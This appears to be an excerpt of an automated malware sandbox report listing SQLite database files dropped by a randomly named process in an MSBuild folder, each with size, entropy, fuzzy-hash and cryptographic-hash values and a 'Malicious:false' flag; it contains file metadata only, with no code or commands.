                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
